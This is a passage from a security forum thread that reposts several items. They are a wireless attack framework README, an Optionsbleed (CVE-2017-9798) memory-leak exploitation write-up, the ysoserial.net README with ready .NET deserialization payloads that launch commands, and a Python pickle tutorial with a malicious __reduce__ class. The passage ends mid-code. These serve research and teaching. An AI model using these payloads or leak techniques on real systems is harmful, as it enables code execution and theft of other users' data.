wlan1 etc are not always deterministic. Sometimes they can change after a reboot and suddenly nzyme will attempt to use the onboard WiFi chip that does not support moniotr mode. To avoid this problem, you can "pin" interface names by MAC address. I like to rename the onboard chip to wlanBoard to avoid accidental usage. This is what ifconfig looks like with no external WiFi adapters plugged in. pi@parabola:~ $ ifconfig eth0 Link encap:Ethernet HWaddr b8:27:eb:0f:0e:d4 inet addr:172.16.0.136 Bcast:172.16.0.255 Mask:255.255.255.0 inet6 addr: fe80::8966:2353:4688:c9a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1327 errors:0 dropped:22 overruns:0 frame:0 TX packets:1118 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:290630 (283.8 KiB) TX bytes:233228 (227.7 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:304 errors:0 dropped:0 overruns:0 frame:0 TX packets:304 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:24552 (23.9 KiB) TX bytes:24552 (23.9 KiB) wlan0 Link encap:Ethernet HWaddr b8:27:eb:5a:5b:81 inet6 addr: fe80::77be:fb8a:ad75:cca9/64 Scope:Link UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) In this case wlan0 is the onboard WiFi chip that we want to rename to wifiBoard. Open the file /lib/udev/rules.d/75-persistent-net-generator.rules and add wlan* to the device name whitelist: # device name whitelist KERNEL!="wlan*|ath*|msh*|ra*|sta*|ctc*|lcs*|hsi*", \ GOTO="persistent_net_generator_end" Reboot the system. After it is back up, open /etc/udev/rules.d/70-persistent-net.rules and change the NAME variable: SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="b8:27:eb:5a:5b:81", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNEL=="wlan*", NAME="wlanBoard" Reboot the system again and enjoy the consistent naming. Any new WiFi adapter you plug in, will be a classic, numbered wlan0, wlan1 etc that can be safely referenced in the nzyme config without the chance of accidentally selecting the onboard chip, because it's called wlanBoard now. eth0 Link encap:Ethernet HWaddr b8:27:eb:0f:0e:d4 inet addr:172.16.0.136 Bcast:172.16.0.255 Mask:255.255.255.0 inet6 addr: fe80::8966:2353:4688:c9a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:349 errors:0 dropped:8 overruns:0 frame:0 TX packets:378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:75761 (73.9 KiB) TX bytes:69865 (68.2 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:228 errors:0 dropped:0 overruns:0 frame:0 TX packets:228 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:18624 (18.1 KiB) TX bytes:18624 (18.1 KiB) wlanBoard Link encap:Ethernet HWaddr b8:27:eb:5a:5b:81 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Known issues Some WiFi adapters will not report the MAC timestamp in the radiotap header. The field will simply be missing in Graylog. This is usually an issue with the driver. The deauthentication and disassociation reason field is not reported correctly on some systems. This is known to be an issue on a 2016 MacBook Pro running macOS Sierra. Legal notice Make sure to comply with local laws, especially with regards to wiretapping, when running nzyme. Note that nzyme is never decrypting any data but only reading unencrypted data on unlicensed frequencies. Sursa: https://github.com/lennartkoopmann/nzyme
-
- 1
-
-
SniffAir SniffAir is an open-source wireless security framework. Sniffair allows for the collection, management, and analyzation of wireless traffic. In additional, SniffAir can also be used to preform sophisticated wireless attacks. SniffAir was born out of the hassle of managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws or malicious traffic. SniffAir is developed by @Tyl0us and @theDarracott Install To install run the setup.py script $python setup.py Usage % * ., % % ( ,# (..# % /@@@@@&, *@@% &@, @@# /@@@@@@@@@ .@@@@@@@@@. ,/ # # (%%%* % (.(. .@@ &@@@@@@%. .@@& *&@ %@@@@. &@, @@% %@@,,,,,,, ,@@,,,,,,, .( % % %%# # % # ,@@ @@(,,,#@@@. %@% %@@(@@. &@, @@% %@@ ,@@ /* # /*, %.,, ,@@ @@* #@@ ,@@& %@@ ,@@* &@, @@% %@@ ,@@ .# //#(, (, ,@@ @@* &@% .@@@@@. %@@ .@@( &@, @@% %@@%%%%%%* ,@@%%%%%%# (# ##. ,@@ @@&%%%@@@% *@@@@ %@@ .@@/ &@, @@% %@@,,,,,, ,@@,,,,,,. %#####% ,@@ @@(,,%@@% @@% %@@ @@( &@, @@% %@@ ,@@ % (*/ # ,@@ @@* @@@ %@% %@@ @@&&@, @@% %@@ ,@@ % # .# .# ,@@ @@* @@% .@@&/,,#@@@ %@@ &@@@, @@% %@@ ,@@ /(* /(# ,@@ @@* @@# *%@@@&* *%# ,%# #%/ *%# %% #############. .%# #%. .%% (@Tyl0us & @theDarracott) >> [default]# help Commands ======== workspace Manages workspaces (create, list, load, delete) live_capture Initiates an valid wireless interface to collect wireless pakcets to be parsed (requires the interface name) offline_capture Begins parsing wireless packets using an pcap file-kistmit .pcapdump work best (requires the full path) offline_capture_list Begins parsing wireless packets using an list of pcap file-kistmit .pcapdump work best (requires the full path) query Executes a quey on the contents of the acitve workspace help Displays this help menu clear Clears the screen show Shows the contents of a table, specific information accorss all tables or the avilable modules inscope Add ESSID to scope. inscope [ESSID] use Use a SniffAir module info Displays all varible infomraiton regardin the selected module set Sets a varible in module exploit Runs the loaded module exit Exit SniffAir >> [default]# Begin First create or load a new or existing workspace using the command workspace create <workspace> or workspace load <workspace> command. To view all existing workspaces use the workspace list command and workspace delete <workspace> command to delete the desired workspace: >> [default]# workspace Manages workspaces Command Option: workspaces [create|list|load|delete] >> [default]# workspace create demo [+] Workspace demo created Load data into a desired workplace from a pcap file using the command offline_capture <the full path to the pcap file>. To load a series of pcap files use the command offline_capture_list <the full path to the file containing the list of pcap name> (this file should contain the full patches to each pcap file). >> [demo]# offline_capture /root/sniffair/demo.pcapdump \ [+] Completed [+] Cleaning Up Duplicates [+] ESSIDs Observed Show Command The show command displays the contents of a table, specific information across all tables or the available modules, using the following syntax: >> [demo]# show table AP +------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+ | ID | ESSID | BSSID | VENDOR | CHAN | PWR | ENC | CIPHER | AUTH | |------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------| | 1 | HoneyPot | c4:6e:1f:0c:82:03 | TP-LINK TECHNOLOGIES CO. LTD. | 4 | -17 | WPA2 | TKIP | MGT | | 2 | Demo | 80:2a:a8:5a:fb:2a | Ubiquiti Networks Inc. | 11 | -19 | WPA2 | CCMP | PSK | | 3 | Demo5ghz | 82:2a:a8:5b:fb:2a | Unknown | 36 | -27 | WPA2 | CCMP | PSK | | 4 | HoneyPot1 | c4:6e:1f:0c:82:05 | TP-LINK TECHNOLOGIES CO. LTD. | 36 | -29 | WPA2 | TKIP | PSK | | 5 | BELL456 | 44:e9:dd:4f:c2:7a | Sagemcom Broadband SAS | 6 | -73 | WPA2 | CCMP | PSK | +------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+ >> [demo]# show SSIDS --------- HoneyPot Demo HoneyPot1 BELL456 Hidden Demo5ghz --------- The query command can be used to display a unique set of data based on the parememters specificed. The query command uses sql syntax. Modules Modules can be used to analyze the data contained in the workspaces or preform offensive wireless attacks using the use <module name> command. For some modules additional variables may need to be set. They can be set using the set command set <variable name> <variable value>: >> [demo]# show modules Available Modules [+] Run Hidden SSID [+] Evil Twin [+] Captive Portal [+] Auto EAP [+] Exporter >> [demo]# >> [demo]# use Captive Portal >> [demo][Captive Portal]# info Globally Set Varibles ===================== Module: Captive Portal Interface: SSID: Channel: Template: Cisco (More to be added soon) >> [demo][Captive Portal]# set Interface wlan0 >> [demo][Captive Portal]# set SSID demo >> [demo][Captive Portal]# set Channel 1 >> [demo][Captive Portal]# info Globally Set Varibles ===================== Module: Captive Portal Interface: wlan0 SSID: demo Channel: 1 Template: Cisco (More to be added soon) >> [demo][Captive Portal]# Once all varibles are set, then execute the exploit command to run the desired attack. Export To export all information stored in a workspace’s tables using the Exporter module and setting the desired path. Sursa: https://github.com/Tylous/SniffAir
-
- 1
-
-
Testing Optionsbleed Written by:Mike Czumak Written on:September 23, 2017 Introduction I took a few minutes to test the Optionsbleed vuln (CVE-2017-9798), specifically to see whether modifying the length and/or quantity of Options/Methods in the .htaccess file would enable me to extract anything of substance from memory. Ultimately it seems that by modifying the length of the entries in the .htaccess file, I was able to gain access to hundreds of bytes of POST data of a different virtual host. Details My setup was simple…two virtual hosts running an an Apache server hosted on a Linux VM. Each virtual host ran on a different port and had separate directories and error logs. Virtual Host 1 (the running on port 80) was simply hosting a “hello” index.html. This was going to be my “attacker” site that would host the malicious .htaccess file. Virtual Host 2 (the “victim” site running on port 81) was hosting a php page that takes three inputs…username, password, and a third, variable length variable. 1 2 3 4 5 6 7 8 9 10 11 <?php $user = $_POST["username"]; $pwd = $_POST["password"]; $otherdata = $_POST["otherdata"]; ?> <form action="index.php" method="POST"> Otherdata: <input type="text" name="otherdata"><br> Username: <input type="text" name="username"><br> Password: <input type="text" name="password"><br> <input type="submit" value="Submit"> </form> Throughout the remainder of this post, I’ll refer to them as Site1 (Attacker Site on Virtual Host 1) and Site 2 (Victim Site on Virtual Host 2). I started with an .htaccess file on Site1 that looked as follows: 1 2 3 <Limit method0 method1 method2 method3 method4 method5> Allow from all </Limit> Making several OPTIONS requests for Site1 resulted in a modified but fairly innocuous Accept header: 1 Allow: GET,POST,OPTIONS,HEAD,,allow,,,,,,,,,,,,,,, Slight modifications in content and length did return a few varying bytes but nothing very different from the examples I had already seen online and nothing that was of particular interest. I started extending the length of each option/method in the .htacess file (using a simple numeric string of 0123456789) until I got to the following <Limit 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789> Allow from all </Limit> It’s three entries of different lengths: 100, 3000, and 2000. After multiple OPTIONS requests I got this: Definitely good length, but the content is uninteresting. I let Burp Intruder continue to make OPTIONS requests while I submitted a test POST request on Site2. While the POST on Site2 was successful, my OPTIONS requests running on Site1 began generating 500 errors. I looked at the error log on Site1 and saw multiple entries of varying content that looked like the following: [Thu Sep 21 23:45:44.990337 2017] [http:error] [pid 74566] [client 192.168.1.234:62875] AH02430: Response header 'Allow' value of 'GET,OPTIONS,POST,HEAD,0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901(@\xe8\x0f\xb2\x7f' contains invalid characters, aborting requ It appeared that some of the non-ASCII content it was grabbing from memory was making the request invalid to Apache, resulting in the 500 error. I figured it was a long-shot but I tried HttpProtocolOptions Unsafe to see if it could be returned to the client but some of the characters were still considered invalid. Nevertheless, I figured it didn’t matter much given the more viable attack vector would be a malicious actor modifying the .htaccess file on their virtual host of a shared hosting environment. It would stand to reason that they would also have access to their own web server error logs as well (and wouldn’t need to rely on data returned to the client). So, now I wanted to see if it was possible to access the POST data from Site2 in the error log of Site1 by modifying the .htaccess file further. After a bit of trial and error, I was able to consistently obtain POST data from Site2 in Site1’s error logs by doing the follow: First, I used the earlier .htaccess file with the initial set of three varying length numerical strings (100, 3000, 2000) and made a few thousand OPTIONS requests via Burp Intruder. Then, I switched up the .htaccess file to read as follows: 1 2 3 <Limit 0123456789 0123456789 0123456789> Allow from all </Limit> I left Burp Intruder OPTIONS requests running on Site1 with this .htaccess file, which began to generate 500 errors. While that was running, I submitted the following request to the PHP page on Site2: And here’s what I got in the error log on Site1: If you try to replicate this, you may get different results, especially if you deviate in length for either the .htaccess entries or the POST request on virtual host 2. Obviously, in an attack scenario, only the .htacess file would be under the bad actor’s control and the POST request on another virtual host would be unpredictable in content and length. However, I did find that varying lengths still resulted in data captured in the error log…it just may not be consistent. Experiment to see for yourself. UPDATE #1: I intentionally didn’t speculate on whether these test results are in any way significant simply because I may be missing something that would make this impractical in un-patched environments. Most organizations aren’t likely going to have exposed shared hosting environments in their own network anyway (and if they do provide the ability for untrusted actors to modify .htaccess on their servers they have bigger problems). For those that have web applications hosted by external hosting providers, my test environment may have been too simple or I might be missing a key consideration regarding shared memory and the typical multi-tenant hosting environment. In any event, I figured I would share these results in case it’s helpful for others to investigate further and either replicate or disprove the results. UPDATE #2: I have been able to get the POST data from Site2 to return directly to the client without generating an error fairly consistently by swapping out the values in the .htaccess file multiple times while the OPTIONS requests are running. Here is what has been working for me: Start running the OPTIONS requests on Site1 using Intruder (I just let it run for 99,999 requests) using the 100, 3000, 2000 length values in .htaccess. Modify .htaccess to use the three smaller 0123456789, 0123456789, 0123456789 values as shown previously. Switch back to the 100, 3000, 2000 lengths. Modify the .htaccess file again ,this time using ten 0123456789 values. Submit the POST request on Site2. Below is the result in *most* cases Again, keep in mind that this is partly dependent upon the length of the POST request submitted on site 2. You can adjust the length of the testdata string to see how your results vary. Until next time, Mike Follow @securitysift Sursa: https://www.securitysift.com/testing-optionsbleed/
-
ysoserial.net A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization. Description ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host. It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath. This project is inspired by Chris Frohoff's ysoserial project Disclaimer This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. This software is a personal project and not related with any companies, including Project owner and contributors employers. Usage $ ./ysoserial -h ysoserial.net generates deserialization payloads for a variety of .NET formatters. Available formatters: ActivitySurrogateSelector (ActivitySurrogateSelector gadget by James Forshaw. This gadget ignores the command parameter and executes the constructor of ExploitClass class.) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter LosFormatter ObjectDataProvider (ObjectDataProvider Gadget by Oleksandr Mirosh and Alvaro Munoz) Formatters: Json.Net FastJson JavaScriptSerializer PSObject (PSObject Gadget by Oleksandr Mirosh and Alvaro Munoz. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter NetDataContractSerializer LosFormatter TypeConfuseDelegate (TypeConfuseDelegate gadget by James Forshaw) Formatters: BinaryFormatter ObjectStateFormatter NetDataContractSerializer LosFormatter Usage: ysoserial.exe [options] Options: -o, --output=VALUE the output format (raw|base64). -g, --gadget=VALUE the gadget chain. -f, --formatter=VALUE the formatter. -c, --command=VALUE the command to be executed. -t, --test whether to run payload locally. Default: false -h, --help show this message and exit Examples $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t { '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd','/ccalc'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} } $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAJVN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QBAAAABkNsaVhtbAECAAAABgMAAACJFQ0KPE9ianMgVmVyc2lvbj0iMS4xLjAuMSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vcG93ZXJzaGVsbC8yMDA0LzA0Ij4mI3hEOw0KPE9iaiBSZWZJZD0iMCI+JiN4RDsNCiAgICA8VE4gUmVmSWQ9IjAiPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZSNTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uL1J1bnNwYWNlSW52b2tlNTwvVD4mI3hEOw0KICAgICAgPFQ+TWljcm9zb2Z0Lk1hbmFnZW1lbnQuSW5mcmFzdHJ1Y3R1cmUuQ2ltSW5zdGFuY2UjUnVuc3BhY2VJbnZva2U1PC9UPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZTwvVD4mI3hEOw0KICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4mI3hEOw0KICAgIDwvVE4+JiN4RDsNCiAgICA8VG9TdHJpbmc+UnVuc3BhY2VJbnZva2U1PC9Ub1N0cmluZz4mI3hEOw0KICAgIDxPYmogUmVmSWQ9IjEiPiYjeEQ7DQogICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+JiN4RDsNCiAgICAgIDxUb1N0cmluZz5SdW5zcGFjZUludm9rZTU8L1RvU3RyaW5nPiYjeEQ7DQogICAgICA8UHJvcHM+JiN4RDsNCiAgICAgICAgPE5pbCBOPSJQU0NvbXB1dGVyTmFtZSIgLz4mI3hEOw0KCQk8T2JqIE49InRlc3QxIiBSZWZJZCA9IjIwIiA+ICYjeEQ7DQogICAgICAgICAgPFROIFJlZklkPSIxIiA+ICYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcltdLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9UPiYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uQXJyYXk8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPFMgTj0iSGFzaCIgPiAgDQoJCSZsdDtSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSImZ3Q7DQoJICZsdDtPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgJmd0Ow0KICAgICAmbHQ7T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnMmZ3Q7DQogICAgICAgICZsdDtTeXN0ZW06U3RyaW5nJmd0O2NtZCZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgICAgJmx0O1N5c3RlbTpTdHJpbmcmZ3Q7L2MgImNhbGMiICZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgJmx0Oy9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycyZndDsNCiAgICAmbHQ7L09iamVjdERhdGFQcm92aWRlciZndDsNCiZsdDsvUmVzb3VyY2VEaWN0aW9uYXJ5Jmd0Ow0KCQkJPC9TPiYjeEQ7DQogICAgICAgICAgPC9MU1Q+JiN4RDsNCiAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgIDwvUHJvcHM+JiN4RDsNCiAgICAgIDxNUz4mI3hEOw0KICAgICAgICA8T2JqIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIj4gJiN4RDsNCiAgICAgICAgICA8VE4gUmVmSWQ9IjEiID4gJiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3Q8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+ICYjeEQ7DQogICAgICAgICAgICAgIDxNUz4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49IkNsYXNzTmFtZSI+UnVuc3BhY2VJbnZva2U1PC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPFMgTj0iTmFtZXNwYWNlIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uPC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPE5pbCBOPSJTZXJ2ZXJOYW1lIiAvPiYjeEQ7DQogICAgICAgICAgICAgICAgPEkzMiBOPSJIYXNoIj40NjA5MjkxOTI8L0kzMj4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49Ik1pWG1sIj4gJmx0O0NMQVNTIE5BTUU9IlJ1bnNwYWNlSW52b2tlNSIgJmd0OyZsdDtQUk9QRVJUWSBOQU1FPSJ0ZXN0MSIgVFlQRSA9InN0cmluZyIgJmd0OyZsdDsvUFJPUEVSVFkmZ3Q7Jmx0Oy9DTEFTUyZndDs8L1M+JiN4RDsNCiAgICAgICAgICAgICAgPC9NUz4mI3hEOw0KICAgICAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgICAgICA8L0xTVD4mI3hEOw0KICAgICAgICA8L09iaj4mI3hEOw0KICAgICAgPC9NUz4mI3hEOw0KICAgIDwvT2JqPiYjeEQ7DQogICAgPE1TPiYjeEQ7DQogICAgICA8UmVmIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIiAvPiYjeEQ7DQogICAgPC9NUz4mI3hEOw0KICA8L09iaj4mI3hEOw0KPC9PYmpzPgs= Contributing Fork it Create your feature branch (git checkout -b my-new-feature) Commit your changes (git commit -am 'Add some feature') Push to the branch (git push origin my-new-feature) Create new Pull Request Additional Reading Are you my Type? Friday the 13th: JSON Attacks - Slides Friday the 13th: JSON Attacks - Whitepaper Exploiting .NET Managed DCOM Sursa: https://github.com/pwntester/ysoserial.net
-
- 1
-
-
Explaining and exploiting deserialization vulnerability with Python (EN) Sat 23 September 2017 Dan Lousqui Deserialization? Even though it was neither present in OWASP TOP 10 2013, nor in OWASP TOP 10 2017 RC1, Deserialization of untrusted data is a very serious vulnerability that we can see more and more often on current security disclosures. Serialization and Deserialization are mechanisms used in many environment (web, mobile, IoT, ...) when you need to convert any Object (it can be an OOM, an array, a dictionary, a file descriptor, ... anything) to something that you can put "outside" of your application (network, file system, database, ...). This conversion can be in both way, and it's very convenient if you need to save or transfer data (Ex: share the status of a game in multilayer game, create an "export" / "backup" file in a project, ...). However, we will see in this article how this kind of behavior can be very dangerous... and therefore, why I think this vulnerability will be present in OWASP TOP 10 2017 RC2. In python? With python, the default library used to serialize and deserialize objects is pickle. It is a really easy to use library (compared to something like sqlite3) and very convenient if you need to persist data. For example, if you want to save objects: import pickle import datetime my_data = {} my_data['last-modified'] = str(datetime.datetime.now()) my_data['friends'] = ["alice", "bob"] pickle_data = pickle.dumps(my_data) with open("backup.data", "wb") as file: file.write(pickle_data) That will create a backup.data file with the following content: last-modifiedqX2017-09-23 00:23:29.986499qXfriendsq]q(XaliceqXbobqeu. And if you want to retrieve your data with Python, it's easy: import pickle with open("backup.data", "rb") as file: pickle_data = file.read() my_data = pickle.loads(pickle_data) my_data # {'friends': ['alice', 'bob'], 'last-modified': '2001-01-01 01:02:03.456789'} Awesome, isn't it? Introducing... Pickle pRick ! In order to illustrate the awesomeness of pickle in term of insecurity, I developed a vulnerable application. You can retrieve the application on the TheBlusky/pickle-prick repository. As always with my Docker, just execute the build.sh or build.bat script, and the vulnerable project will be launched. This application is for Ricks, from the Rick and Morty TV show. For those who don't know this show (shame ...) Rick is a genius scientist who travel between universes and planets for great adventures with his grand son Morty. The show implies many multiverse and time-travel dilemma. Each universe got their own Rick, so I developed an application for every Rick, so they can trace their adventures by storing when, where and with who they travelled. Each Ricks must be able to use the application, and the data should never be stored on the server, so one Rick cannot see the data of other Ricks. In order to do that, Rick can export his agenda into a pickle_rick.data file that can be imported later. Obviously, this application is vulnerable (Rick would not offer other Ricks this kind of gift without a backdoor ...). If you don't want to be spoiled, and want to play a little game, you should stop reading this article and try to launch the application (locally), and try to pwn it (Without looking at the exploit folder obviously, ...) What's wrong with Pickle? pickle (like any other serialization / deserialization library) provides a way to execute arbitrary command (even if few developers know it). In order to do that, you simply have to create an object, and to implement a __reduce__(self) method. This method should return a list of n elements, the first being a callable, and the others arguments. The callable will be executed with underlying arguments, and the result will be the "unserialization" of the object. For exemple, if you save the following pickle object: import pickle import os class EvilPickle(object): def __reduce__(self): return (os.system, ('echo Powned', )) pickle_data = pickle.dumps(EvilPickle()) with open("backup.data", "wb") as file: file.write(pickle_data) And then later, try to deserialize the object : import pickle with open("backup.data", "rb") as file: pickle_data = 